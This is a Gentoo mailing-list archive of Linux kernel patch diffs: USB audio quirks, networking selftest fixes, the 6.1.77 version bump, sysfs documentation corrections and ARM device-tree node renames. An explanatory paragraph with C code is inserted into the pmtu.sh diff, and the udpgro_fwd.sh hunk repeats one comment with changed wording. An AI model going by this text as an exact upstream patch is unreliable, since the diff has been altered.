+-		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
+-	DEVICE_FLG(0x2b53, 0x0024, /* Fiero SC-01 (firmware v1.0.0 @ 96 kHz) */
+-		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
+-	DEVICE_FLG(0x2b53, 0x0031, /* Fiero SC-01 (firmware v1.1.0) */
+-		   QUIRK_FLAG_GENERIC_IMPLICIT_FB),
+-	DEVICE_FLG(0x0525, 0xa4ad, /* Hamedal C20 usb camero */
+-		   QUIRK_FLAG_IFACE_SKIP_CLOSE),
+-	DEVICE_FLG(0x0ecb, 0x205c, /* JBL Quantum610 Wireless */
+-		   QUIRK_FLAG_FIXED_RATE),
+-	DEVICE_FLG(0x0ecb, 0x2069, /* JBL Quantum810 Wireless */
+-		   QUIRK_FLAG_FIXED_RATE),
+-	DEVICE_FLG(0x1bcf, 0x2283, /* NexiGo N930AF FHD Webcam */
+-		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 
+ 	/* Vendor matches */
+ 	VENDOR_FLG(0x045e, /* MS Lifecam */
+diff --git a/tools/testing/selftests/net/cmsg_ipv6.sh b/tools/testing/selftests/net/cmsg_ipv6.sh
+index 330d0b1ceced3..c921750ca118d 100755
+--- a/tools/testing/selftests/net/cmsg_ipv6.sh
++++ b/tools/testing/selftests/net/cmsg_ipv6.sh
+@@ -91,7 +91,7 @@ for ovr in setsock cmsg both diff; do
+ 	check_result $? 0 "TCLASS $prot $ovr - pass"
+ 
+ 	while [ -d /proc/$BG ]; do
+-	    $NSEXE ./cmsg_sender -6 -p u $TGT6 1234
++	    $NSEXE ./cmsg_sender -6 -p $p $m $((TOS2)) $TGT6 1234
+ 	done
+ 
+ 	tcpdump -r $TMPF -v 2>&1 | grep "class $TOS2" >> /dev/null
+@@ -128,7 +128,7 @@ for ovr in setsock cmsg both diff; do
+ 	check_result $? 0 "HOPLIMIT $prot $ovr - pass"
+ 
+ 	while [ -d /proc/$BG ]; do
+-	    $NSEXE ./cmsg_sender -6 -p u $TGT6 1234
++	    $NSEXE ./cmsg_sender -6 -p $p $m $LIM $TGT6 1234
+ 	done
+ 
+ 	tcpdump -r $TMPF -v 2>&1 | grep "hlim $LIM[^0-9]" >> /dev/null
+diff --git a/tools/testing/selftests/net/pmtu.sh b/tools/testing/selftests/net/pmtu.sh
+index 1b6e484e586dc..00ab4c6e40446 100755
+--- a/tools/testing/selftests/net/pmtu.sh
++++ b/tools/testing/selftests/net/pmtu.sh
+@@ -1928,6 +1928,13 @@ check_command() {
+ 	return 0
+ }
+ 
++check_running() {
++	pid=${1}
++	cmd=${2}
++
++	[ "$(cat /proc/${pid}/cmdline 2>/dev/null | tr -d '\0')" = "${cmd}" ]
++}
++
+ test_cleanup_vxlanX_exception() {
+ 	outer="${1}"
+ 	encap="vxlan"
+@@ -1958,11 +1965,12 @@ test_cleanup_vxlanX_exception() {
+ 
+ 	${ns_a} ip link del dev veth_A-R1 &
+ 	iplink_pid=$!
+-	sleep 1
+-	if [ "$(cat /proc/${iplink_pid}/cmdline 2>/dev/null | tr -d '\0')" = "iplinkdeldevveth_A-R1" ]; then
+-		err "  can't delete veth device in a timely manner, PMTU dst likely leaked"
+-		return 1
+-	fi
++	for i in $(seq 1 20); do
++		check_running ${iplink_pid} "iplinkdeldevveth_A-R1" || return 0
++		sleep 0.1
++	done
++	err "  can't delete veth device in a timely manner, PMTU dst likely leaked"
++	return 1
+ }
+ 
+ test_cleanup_ipv6_exception() {
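
The pmtu.sh hunk above replaces a single fixed "sleep 1" with up to twenty 0.1 s polls through the new check_running() helper, so slow (e.g. debug) kernels get more time while fast ones stop waiting as soon as "ip link del" exits. The same bounded-poll idea in C (the names and the 2 s budget are illustrative):

#include <stdbool.h>
#include <unistd.h>

static bool wait_for_exit(bool (*still_running)(void))
{
	for (int i = 0; i < 20; i++) {
		if (!still_running())
			return true;     /* finished promptly */
		usleep(100 * 1000);      /* 100 ms per try, 2 s budget */
	}
	return false;                    /* likely stuck or leaked */
}
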
+diff --git a/tools/testing/selftests/net/udpgro_fwd.sh b/tools/testing/selftests/net/udpgro_fwd.sh
+index c079565add392..9690a5d7ffd7d 100755
+--- a/tools/testing/selftests/net/udpgro_fwd.sh
++++ b/tools/testing/selftests/net/udpgro_fwd.sh
+@@ -37,6 +37,10 @@ create_ns() {
+ 	for ns in $NS_SRC $NS_DST; do
+ 		ip netns add $ns
+ 		ip -n $ns link set dev lo up
++
++		# disable route solicitations to decrease 'noise' traffic
++		# disable router solicitations to decrease 'noise' traffic
++		ip netns exec $ns sysctl -qw net.ipv6.conf.all.router_solicitations=0
+ 	done
+ 
+ 	ip link add name veth$SRC type veth peer name veth$DST
+@@ -78,6 +82,12 @@ create_vxlan_pair() {
+ 		create_vxlan_endpoint $BASE$ns veth$ns $BM_NET_V6$((3 - $ns)) vxlan6$ns 6
+ 		ip -n $BASE$ns addr add dev vxlan6$ns $OL_NET_V6$ns/24 nodad
+ 	done
++
++	# preload neighbour cache, to avoid some noisy traffic
++	local addr_dst=$(ip -j -n $BASE$DST link show dev vxlan6$DST  |jq -r '.[]["address"]')
++	local addr_src=$(ip -j -n $BASE$SRC link show dev vxlan6$SRC  |jq -r '.[]["address"]')
++	ip -n $BASE$DST neigh add dev vxlan6$DST lladdr $addr_src $OL_NET_V6$SRC
++	ip -n $BASE$SRC neigh add dev vxlan6$SRC lladdr $addr_dst $OL_NET_V6$DST
+ }
+ 
+ is_ipv6() {
+@@ -117,7 +127,7 @@ run_test() {
+ 	# not enable GRO
+ 	ip netns exec $NS_DST $ipt -A INPUT -p udp --dport 4789
+ 	ip netns exec $NS_DST $ipt -A INPUT -p udp --dport 8000
+-	ip netns exec $NS_DST ./udpgso_bench_rx -C 1000 -R 10 -n 10 -l 1300 $rx_args &
++	ip netns exec $NS_DST ./udpgso_bench_rx -C 2000 -R 100 -n 10 -l 1300 $rx_args &
+ 	local spid=$!
+ 	sleep 0.1
+ 	ip netns exec $NS_SRC ./udpgso_bench_tx $family -M 1 -s 13000 -S 1300 -D $dst
+@@ -166,7 +176,7 @@ run_bench() {
+ 	# bind the sender and the receiver to different CPUs to try
+ 	# get reproducible results
+ 	ip netns exec $NS_DST bash -c "echo 2 > /sys/class/net/veth$DST/queues/rx-0/rps_cpus"
+-	ip netns exec $NS_DST taskset 0x2 ./udpgso_bench_rx -C 1000 -R 10  &
++	ip netns exec $NS_DST taskset 0x2 ./udpgso_bench_rx -C 2000 -R 100  &
+ 	local spid=$!
+ 	sleep 0.1
+ 	ip netns exec $NS_SRC taskset 0x1 ./udpgso_bench_tx $family -l 3 -S 1300 -D $dst
+diff --git a/tools/testing/selftests/net/udpgso_bench_rx.c b/tools/testing/selftests/net/udpgso_bench_rx.c
+index f35a924d4a303..1cbadd267c963 100644
+--- a/tools/testing/selftests/net/udpgso_bench_rx.c
++++ b/tools/testing/selftests/net/udpgso_bench_rx.c
+@@ -375,7 +375,7 @@ static void do_recv(void)
+ 			do_flush_udp(fd);
+ 
+ 		tnow = gettimeofday_ms();
+-		if (tnow > treport) {
++		if (!cfg_expected_pkt_nr && tnow > treport) {
+ 			if (packets)
+ 				fprintf(stderr,
+ 					"%s rx: %6lu MB/s %8lu calls/s\n",


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-02-05 21:01 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-02-05 21:01 UTC (permalink / raw
  To: gentoo-commits

commit:     d06ddefa86460048b227779b9813a87f6d78e2dc
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Feb  5 21:01:21 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Feb  5 21:01:21 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=d06ddefa

Linux patch 6.1.77

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1076_linux-6.1.77.patch | 10940 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 10944 insertions(+)

diff --git a/0000_README b/0000_README
index a50e0cff..264766b5 100644
--- a/0000_README
+++ b/0000_README
@@ -347,6 +347,10 @@ Patch:  1075_linux-6.1.76.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.76
 
+Patch:  1076_linux-6.1.77.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.77
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1076_linux-6.1.77.patch b/1076_linux-6.1.77.patch
new file mode 100644
index 00000000..7b188eeb
--- /dev/null
+++ b/1076_linux-6.1.77.patch
@@ -0,0 +1,10940 @@
+diff --git a/Documentation/ABI/testing/sysfs-class-net-queues b/Documentation/ABI/testing/sysfs-class-net-queues
+index 978b76358661a..40d5aab8452d5 100644
+--- a/Documentation/ABI/testing/sysfs-class-net-queues
++++ b/Documentation/ABI/testing/sysfs-class-net-queues
+@@ -1,4 +1,4 @@
+-What:		/sys/class/<iface>/queues/rx-<queue>/rps_cpus
++What:		/sys/class/net/<iface>/queues/rx-<queue>/rps_cpus
+ Date:		March 2010
+ KernelVersion:	2.6.35
+ Contact:	netdev@vger.kernel.org
+@@ -8,7 +8,7 @@ Description:
+ 		network device queue. Possible values depend on the number
+ 		of available CPU(s) in the system.
+ 
+-What:		/sys/class/<iface>/queues/rx-<queue>/rps_flow_cnt
++What:		/sys/class/net/<iface>/queues/rx-<queue>/rps_flow_cnt
+ Date:		April 2010
+ KernelVersion:	2.6.35
+ Contact:	netdev@vger.kernel.org
+@@ -16,7 +16,7 @@ Description:
+ 		Number of Receive Packet Steering flows being currently
+ 		processed by this particular network device receive queue.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/tx_timeout
++What:		/sys/class/net/<iface>/queues/tx-<queue>/tx_timeout
+ Date:		November 2011
+ KernelVersion:	3.3
+ Contact:	netdev@vger.kernel.org
+@@ -24,7 +24,7 @@ Description:
+ 		Indicates the number of transmit timeout events seen by this
+ 		network interface transmit queue.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/tx_maxrate
++What:		/sys/class/net/<iface>/queues/tx-<queue>/tx_maxrate
+ Date:		March 2015
+ KernelVersion:	4.1
+ Contact:	netdev@vger.kernel.org
+@@ -32,7 +32,7 @@ Description:
+ 		A Mbps max-rate set for the queue, a value of zero means disabled,
+ 		default is disabled.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/xps_cpus
++What:		/sys/class/net/<iface>/queues/tx-<queue>/xps_cpus
+ Date:		November 2010
+ KernelVersion:	2.6.38
+ Contact:	netdev@vger.kernel.org
+@@ -42,7 +42,7 @@ Description:
+ 		network device transmit queue. Possible values depend on the
+ 		number of available CPU(s) in the system.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/xps_rxqs
++What:		/sys/class/net/<iface>/queues/tx-<queue>/xps_rxqs
+ Date:		June 2018
+ KernelVersion:	4.18.0
+ Contact:	netdev@vger.kernel.org
+@@ -53,7 +53,7 @@ Description:
+ 		number of available receive queue(s) in the network device.
+ 		Default is disabled.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/byte_queue_limits/hold_time
++What:		/sys/class/net/<iface>/queues/tx-<queue>/byte_queue_limits/hold_time
+ Date:		November 2011
+ KernelVersion:	3.3
+ Contact:	netdev@vger.kernel.org
+@@ -62,7 +62,7 @@ Description:
+ 		of this particular network device transmit queue.
+ 		Default value is 1000.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/byte_queue_limits/inflight
++What:		/sys/class/net/<iface>/queues/tx-<queue>/byte_queue_limits/inflight
+ Date:		November 2011
+ KernelVersion:	3.3
+ Contact:	netdev@vger.kernel.org
+@@ -70,7 +70,7 @@ Description:
+ 		Indicates the number of bytes (objects) in flight on this
+ 		network device transmit queue.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/byte_queue_limits/limit
++What:		/sys/class/net/<iface>/queues/tx-<queue>/byte_queue_limits/limit
+ Date:		November 2011
+ KernelVersion:	3.3
+ Contact:	netdev@vger.kernel.org
+@@ -79,7 +79,7 @@ Description:
+ 		on this network device transmit queue. This value is clamped
+ 		to be within the bounds defined by limit_max and limit_min.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/byte_queue_limits/limit_max
++What:		/sys/class/net/<iface>/queues/tx-<queue>/byte_queue_limits/limit_max
+ Date:		November 2011
+ KernelVersion:	3.3
+ Contact:	netdev@vger.kernel.org
+@@ -88,7 +88,7 @@ Description:
+ 		queued on this network device transmit queue. See
+ 		include/linux/dynamic_queue_limits.h for the default value.
+ 
+-What:		/sys/class/<iface>/queues/tx-<queue>/byte_queue_limits/limit_min
++What:		/sys/class/net/<iface>/queues/tx-<queue>/byte_queue_limits/limit_min
+ Date:		November 2011
+ KernelVersion:	3.3
+ Contact:	netdev@vger.kernel.org
+diff --git a/Documentation/sound/soc/dapm.rst b/Documentation/sound/soc/dapm.rst
+index 8e44107933abf..c3154ce6e1b27 100644
+--- a/Documentation/sound/soc/dapm.rst
++++ b/Documentation/sound/soc/dapm.rst
+@@ -234,7 +234,7 @@ corresponding soft power control. In this case it is necessary to create
+ a virtual widget - a widget with no control bits e.g.
+ ::
+ 
+-  SND_SOC_DAPM_MIXER("AC97 Mixer", SND_SOC_DAPM_NOPM, 0, 0, NULL, 0),
++  SND_SOC_DAPM_MIXER("AC97 Mixer", SND_SOC_NOPM, 0, 0, NULL, 0),
+ 
+ This can be used to merge to signal paths together in software.
+ 
+diff --git a/Makefile b/Makefile
+index 9dd167178ab4c..f5598d90093f5 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 76
++SUBLEVEL = 77
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/imx1-ads.dts b/arch/arm/boot/dts/imx1-ads.dts
+index 5833fb6f15d88..2c817c4a4c68f 100644
+--- a/arch/arm/boot/dts/imx1-ads.dts
++++ b/arch/arm/boot/dts/imx1-ads.dts
+@@ -65,7 +65,7 @@
+ 	pinctrl-0 = <&pinctrl_weim>;
+ 	status = "okay";
+ 
+-	nor: nor@0,0 {
++	nor: flash@0,0 {
+ 		compatible = "cfi-flash";
+ 		reg = <0 0x00000000 0x02000000>;
+ 		bank-width = <4>;
+diff --git a/arch/arm/boot/dts/imx1-apf9328.dts b/arch/arm/boot/dts/imx1-apf9328.dts
+index 77b21aa7a1469..27e72b07b517a 100644
+--- a/arch/arm/boot/dts/imx1-apf9328.dts
++++ b/arch/arm/boot/dts/imx1-apf9328.dts
+@@ -45,7 +45,7 @@
+ 	pinctrl-0 = <&pinctrl_weim>;
+ 	status = "okay";
+ 
+-	nor: nor@0,0 {
++	nor: flash@0,0 {
+ 		compatible = "cfi-flash";
+ 		reg = <0 0x00000000 0x02000000>;
+ 		bank-width = <2>;
+diff --git a/arch/arm/boot/dts/imx1.dtsi b/arch/arm/boot/dts/imx1.dtsi
+index e312f1e74e2fe..4aeb74479f44e 100644
+--- a/arch/arm/boot/dts/imx1.dtsi
++++ b/arch/arm/boot/dts/imx1.dtsi
+@@ -268,9 +268,12 @@
+ 			status = "disabled";
+ 		};
+ 
+-		esram: esram@300000 {
++		esram: sram@300000 {
+ 			compatible = "mmio-sram";
+ 			reg = <0x00300000 0x20000>;
++			ranges = <0 0x00300000 0x20000>;
++			#address-cells = <1>;
++			#size-cells = <1>;
+ 		};
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/imx23-sansa.dts b/arch/arm/boot/dts/imx23-sansa.dts
+index 46057d9bf555b..c2efcc20ae802 100644
+--- a/arch/arm/boot/dts/imx23-sansa.dts
++++ b/arch/arm/boot/dts/imx23-sansa.dts
+@@ -175,10 +175,8 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "i2c-gpio";
+-		gpios = <
+-			&gpio1 24 0		/* SDA */
+-			&gpio1 22 0		/* SCL */
+-		>;
++		sda-gpios = <&gpio1 24 0>;
++		scl-gpios = <&gpio1 22 0>;
+ 		i2c-gpio,delay-us = <2>;	/* ~100 kHz */
+ 	};
+ 
+@@ -186,10 +184,8 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "i2c-gpio";
+-		gpios = <
+-			&gpio0 31 0		/* SDA */
+-			&gpio0 30 0		/* SCL */
+-		>;
++		sda-gpios = <&gpio0 31 0>;
++		scl-gpios = <&gpio0 30 0>;
+ 		i2c-gpio,delay-us = <2>;	/* ~100 kHz */
+ 
+ 		touch: touch@20 {
+diff --git a/arch/arm/boot/dts/imx23.dtsi b/arch/arm/boot/dts/imx23.dtsi
+index 7f4c602454a5f..ec476b1596496 100644
+--- a/arch/arm/boot/dts/imx23.dtsi
++++ b/arch/arm/boot/dts/imx23.dtsi
+@@ -414,7 +414,7 @@
+ 				status = "disabled";
+ 			};
+ 
+-			dma_apbx: dma-apbx@80024000 {
++			dma_apbx: dma-controller@80024000 {
+ 				compatible = "fsl,imx23-dma-apbx";
+ 				reg = <0x80024000 0x2000>;
+ 				interrupts = <7 5 9 26
+diff --git a/arch/arm/boot/dts/imx25-eukrea-cpuimx25.dtsi b/arch/arm/boot/dts/imx25-eukrea-cpuimx25.dtsi
+index 0703f62d10d1c..93a6e4e680b45 100644
+--- a/arch/arm/boot/dts/imx25-eukrea-cpuimx25.dtsi
++++ b/arch/arm/boot/dts/imx25-eukrea-cpuimx25.dtsi
+@@ -27,7 +27,7 @@
+ 	pinctrl-0 = <&pinctrl_i2c1>;
+ 	status = "okay";
+ 
+-	pcf8563@51 {
++	rtc@51 {
+ 		compatible = "nxp,pcf8563";
+ 		reg = <0x51>;
+ 	};
+diff --git a/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-cmo-qvga.dts b/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-cmo-qvga.dts
+index 7d4301b22b902..1ed3fb7b9ce62 100644
+--- a/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-cmo-qvga.dts
++++ b/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-cmo-qvga.dts
+@@ -16,7 +16,7 @@
+ 		bus-width = <18>;
+ 		display-timings {
+ 			native-mode = <&qvga_timings>;
+-			qvga_timings: 320x240 {
++			qvga_timings: timing0 {
+ 				clock-frequency = <6500000>;
+ 				hactive = <320>;
+ 				vactive = <240>;
+diff --git a/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-dvi-svga.dts b/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-dvi-svga.dts
+index 80a7f96de4c6a..64b2ffac463b2 100644
+--- a/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-dvi-svga.dts
++++ b/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-dvi-svga.dts
+@@ -16,7 +16,7 @@
+ 		bus-width = <18>;
+ 		display-timings {
+ 			native-mode = <&dvi_svga_timings>;
+-			dvi_svga_timings: 800x600 {
++			dvi_svga_timings: timing0 {
+ 				clock-frequency = <40000000>;
+ 				hactive = <800>;
+ 				vactive = <600>;
+diff --git a/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-dvi-vga.dts b/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-dvi-vga.dts
+index 24027a1fb46d1..fb074bfdaa8dc 100644
+--- a/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-dvi-vga.dts
++++ b/arch/arm/boot/dts/imx25-eukrea-mbimxsd25-baseboard-dvi-vga.dts
+@@ -16,7 +16,7 @@
+ 		bus-width = <18>;
+ 		display-timings {
+ 			native-mode = <&dvi_vga_timings>;
+-			dvi_vga_timings: 640x480 {
++			dvi_vga_timings: timing0 {
+ 				clock-frequency = <31250000>;
+ 				hactive = <640>;
+ 				vactive = <480>;
+diff --git a/arch/arm/boot/dts/imx25-pdk.dts b/arch/arm/boot/dts/imx25-pdk.dts
+index fb66884d8a2fa..59b40d13a6401 100644
+--- a/arch/arm/boot/dts/imx25-pdk.dts
++++ b/arch/arm/boot/dts/imx25-pdk.dts
+@@ -78,7 +78,7 @@
+ 		bus-width = <18>;
+ 		display-timings {
+ 			native-mode = <&wvga_timings>;
+-			wvga_timings: 640x480 {
++			wvga_timings: timing0 {
+ 				hactive = <640>;
+ 				vactive = <480>;
+ 				hback-porch = <45>;
+diff --git a/arch/arm/boot/dts/imx25.dtsi b/arch/arm/boot/dts/imx25.dtsi
+index 5f90d72b840b0..5ac4549286bd7 100644
+--- a/arch/arm/boot/dts/imx25.dtsi
++++ b/arch/arm/boot/dts/imx25.dtsi
+@@ -543,7 +543,7 @@
+ 			};
+ 
+ 			iim: efuse@53ff0000 {
+-				compatible = "fsl,imx25-iim", "fsl,imx27-iim";
++				compatible = "fsl,imx25-iim";
+ 				reg = <0x53ff0000 0x4000>;
+ 				interrupts = <19>;
+ 				clocks = <&clks 99>;
+diff --git a/arch/arm/boot/dts/imx27-apf27dev.dts b/arch/arm/boot/dts/imx27-apf27dev.dts
+index 6f1e8ce9e76e9..3d9bb7fc3be2e 100644
+--- a/arch/arm/boot/dts/imx27-apf27dev.dts
++++ b/arch/arm/boot/dts/imx27-apf27dev.dts
+@@ -16,7 +16,7 @@
+ 		fsl,pcr = <0xfae80083>;	/* non-standard but required */
+ 		display-timings {
+ 			native-mode = <&timing0>;
+-			timing0: 800x480 {
++			timing0: timing0 {
+ 				clock-frequency = <33000033>;
+ 				hactive = <800>;
+ 				vactive = <480>;
+@@ -47,7 +47,7 @@
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_gpio_leds>;
+ 
+-		user {
++		led-user {
+ 			label = "Heartbeat";
+ 			gpios = <&gpio6 14 GPIO_ACTIVE_HIGH>;
+ 			linux,default-trigger = "heartbeat";
+diff --git a/arch/arm/boot/dts/imx27-eukrea-cpuimx27.dtsi b/arch/arm/boot/dts/imx27-eukrea-cpuimx27.dtsi
+index 74110bbcd9d4f..c7e9235848782 100644
+--- a/arch/arm/boot/dts/imx27-eukrea-cpuimx27.dtsi
++++ b/arch/arm/boot/dts/imx27-eukrea-cpuimx27.dtsi
+@@ -33,7 +33,7 @@
+ 	pinctrl-0 = <&pinctrl_i2c1>;
+ 	status = "okay";
+ 
+-	pcf8563@51 {
++	rtc@51 {
+ 		compatible = "nxp,pcf8563";
+ 		reg = <0x51>;
+ 	};
+@@ -90,7 +90,7 @@
+ &weim {
+ 	status = "okay";
+ 
+-	nor: nor@0,0 {
++	nor: flash@0,0 {
+ 		#address-cells = <1>;
+ 		#size-cells = <1>;
+ 		compatible = "cfi-flash";
+diff --git a/arch/arm/boot/dts/imx27-eukrea-mbimxsd27-baseboard.dts b/arch/arm/boot/dts/imx27-eukrea-mbimxsd27-baseboard.dts
+index 9c3ec82ec7e5a..50fa0bd4c8a18 100644
+--- a/arch/arm/boot/dts/imx27-eukrea-mbimxsd27-baseboard.dts
++++ b/arch/arm/boot/dts/imx27-eukrea-mbimxsd27-baseboard.dts
+@@ -16,7 +16,7 @@
+ 
+ 		display-timings {
+ 			native-mode = <&timing0>;
+-			timing0: 320x240 {
++			timing0: timing0 {
+ 				clock-frequency = <6500000>;
+ 				hactive = <320>;
+ 				vactive = <240>;
+diff --git a/arch/arm/boot/dts/imx27-phytec-phycard-s-rdk.dts b/arch/arm/boot/dts/imx27-phytec-phycard-s-rdk.dts
+index 188639738dc3e..7f36af150a254 100644
+--- a/arch/arm/boot/dts/imx27-phytec-phycard-s-rdk.dts
++++ b/arch/arm/boot/dts/imx27-phytec-phycard-s-rdk.dts
+@@ -19,7 +19,7 @@
+ 		fsl,pcr = <0xf0c88080>;	/* non-standard but required */
+ 		display-timings {
+ 			native-mode = <&timing0>;
+-			timing0: 640x480 {
++			timing0: timing0 {
+ 				hactive = <640>;
+ 				vactive = <480>;
+ 				hback-porch = <112>;
+diff --git a/arch/arm/boot/dts/imx27-phytec-phycore-rdk.dts b/arch/arm/boot/dts/imx27-phytec-phycore-rdk.dts
+index 344e777901524..d133b9f08b3a0 100644
+--- a/arch/arm/boot/dts/imx27-phytec-phycore-rdk.dts
++++ b/arch/arm/boot/dts/imx27-phytec-phycore-rdk.dts
+@@ -19,7 +19,7 @@
+ 
+ 		display-timings {
+ 			native-mode = <&timing0>;
+-			timing0: 240x320 {
++			timing0: timing0 {
+ 				clock-frequency = <5500000>;
+ 				hactive = <240>;
+ 				vactive = <320>;
+diff --git a/arch/arm/boot/dts/imx27-phytec-phycore-som.dtsi b/arch/arm/boot/dts/imx27-phytec-phycore-som.dtsi
+index 3d10273177e9b..a5fdc2fd4ce5a 100644
+--- a/arch/arm/boot/dts/imx27-phytec-phycore-som.dtsi
++++ b/arch/arm/boot/dts/imx27-phytec-phycore-som.dtsi
+@@ -322,7 +322,7 @@
+ &weim {
+ 	status = "okay";
+ 
+-	nor: nor@0,0 {
++	nor: flash@0,0 {
+ 		compatible = "cfi-flash";
+ 		reg = <0 0x00000000 0x02000000>;
+ 		bank-width = <2>;
+diff --git a/arch/arm/boot/dts/imx27.dtsi b/arch/arm/boot/dts/imx27.dtsi
+index e140307be2e7d..eb6daf22486e4 100644
+--- a/arch/arm/boot/dts/imx27.dtsi
++++ b/arch/arm/boot/dts/imx27.dtsi
+@@ -588,6 +588,9 @@
+ 		iram: sram@ffff4c00 {
+ 			compatible = "mmio-sram";
+ 			reg = <0xffff4c00 0xb400>;
++			ranges = <0 0xffff4c00 0xb400>;
++			#address-cells = <1>;
++			#size-cells = <1>;
+ 		};
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/imx28.dtsi b/arch/arm/boot/dts/imx28.dtsi
+index 130b4145af827..b15df16ecb01a 100644
+--- a/arch/arm/boot/dts/imx28.dtsi
++++ b/arch/arm/boot/dts/imx28.dtsi
+@@ -994,7 +994,7 @@
+ 				status = "disabled";
+ 			};
+ 
+-			dma_apbx: dma-apbx@80024000 {
++			dma_apbx: dma-controller@80024000 {
+ 				compatible = "fsl,imx28-dma-apbx";
+ 				reg = <0x80024000 0x2000>;
+ 				interrupts = <78 79 66 0
+diff --git a/arch/arm/boot/dts/imx7d.dtsi b/arch/arm/boot/dts/imx7d.dtsi
+index 7ceb7c09f7ad4..7ef685fdda55e 100644
+--- a/arch/arm/boot/dts/imx7d.dtsi
++++ b/arch/arm/boot/dts/imx7d.dtsi
+@@ -208,9 +208,6 @@
+ };
+ 
+ &ca_funnel_in_ports {
+-	#address-cells = <1>;
+-	#size-cells = <0>;
+-
+ 	port@1 {
+ 		reg = <1>;
+ 		ca_funnel_in_port1: endpoint {
+diff --git a/arch/arm/boot/dts/imx7s.dtsi b/arch/arm/boot/dts/imx7s.dtsi
+index 45947707134b8..4b23630fc738d 100644
+--- a/arch/arm/boot/dts/imx7s.dtsi
++++ b/arch/arm/boot/dts/imx7s.dtsi
+@@ -190,7 +190,11 @@
+ 			clock-names = "apb_pclk";
+ 
+ 			ca_funnel_in_ports: in-ports {
+-				port {
++				#address-cells = <1>;
++				#size-cells = <0>;
++
++				port@0 {
++					reg = <0>;
+ 					ca_funnel_in_port0: endpoint {
+ 						remote-endpoint = <&etm0_out_port>;
+ 					};
+@@ -814,7 +818,7 @@
+ 			};
+ 
+ 			lcdif: lcdif@30730000 {
+-				compatible = "fsl,imx7d-lcdif", "fsl,imx28-lcdif";
++				compatible = "fsl,imx7d-lcdif", "fsl,imx6sx-lcdif";
+ 				reg = <0x30730000 0x10000>;
+ 				interrupts = <GIC_SPI 5 IRQ_TYPE_LEVEL_HIGH>;
+ 				clocks = <&clks IMX7D_LCDIF_PIXEL_ROOT_CLK>,
+@@ -1279,7 +1283,7 @@
+ 		gpmi: nand-controller@33002000{
+ 			compatible = "fsl,imx7d-gpmi-nand";
+ 			#address-cells = <1>;
+-			#size-cells = <1>;
++			#size-cells = <0>;
+ 			reg = <0x33002000 0x2000>, <0x33004000 0x4000>;
+ 			reg-names = "gpmi-nand", "bch";
+ 			interrupts = <GIC_SPI 14 IRQ_TYPE_LEVEL_HIGH>;
+diff --git a/arch/arm/boot/dts/rk3036.dtsi b/arch/arm/boot/dts/rk3036.dtsi
+index 78686fc72ce69..c420c7c642cb0 100644
+--- a/arch/arm/boot/dts/rk3036.dtsi
++++ b/arch/arm/boot/dts/rk3036.dtsi
+@@ -402,12 +402,20 @@
+ 		pinctrl-0 = <&hdmi_ctl>;
+ 		status = "disabled";
+ 
+-		hdmi_in: port {
++		ports {
+ 			#address-cells = <1>;
+ 			#size-cells = <0>;
+-			hdmi_in_vop: endpoint@0 {
++
++			hdmi_in: port@0 {
+ 				reg = <0>;
+-				remote-endpoint = <&vop_out_hdmi>;
++
++				hdmi_in_vop: endpoint {
++					remote-endpoint = <&vop_out_hdmi>;
++				};
++			};
++
++			hdmi_out: port@1 {
++				reg = <1>;
+ 			};
+ 		};
+ 	};
+diff --git a/arch/arm/include/asm/irq_work.h b/arch/arm/include/asm/irq_work.h
+index 3149e4dc1b540..8895999834cc0 100644
+--- a/arch/arm/include/asm/irq_work.h
++++ b/arch/arm/include/asm/irq_work.h
+@@ -9,6 +9,4 @@ static inline bool arch_irq_work_has_interrupt(void)
+ 	return is_smp();
+ }
+ 
+-extern void arch_irq_work_raise(void);
+-
+ #endif /* _ASM_ARM_IRQ_WORK_H */
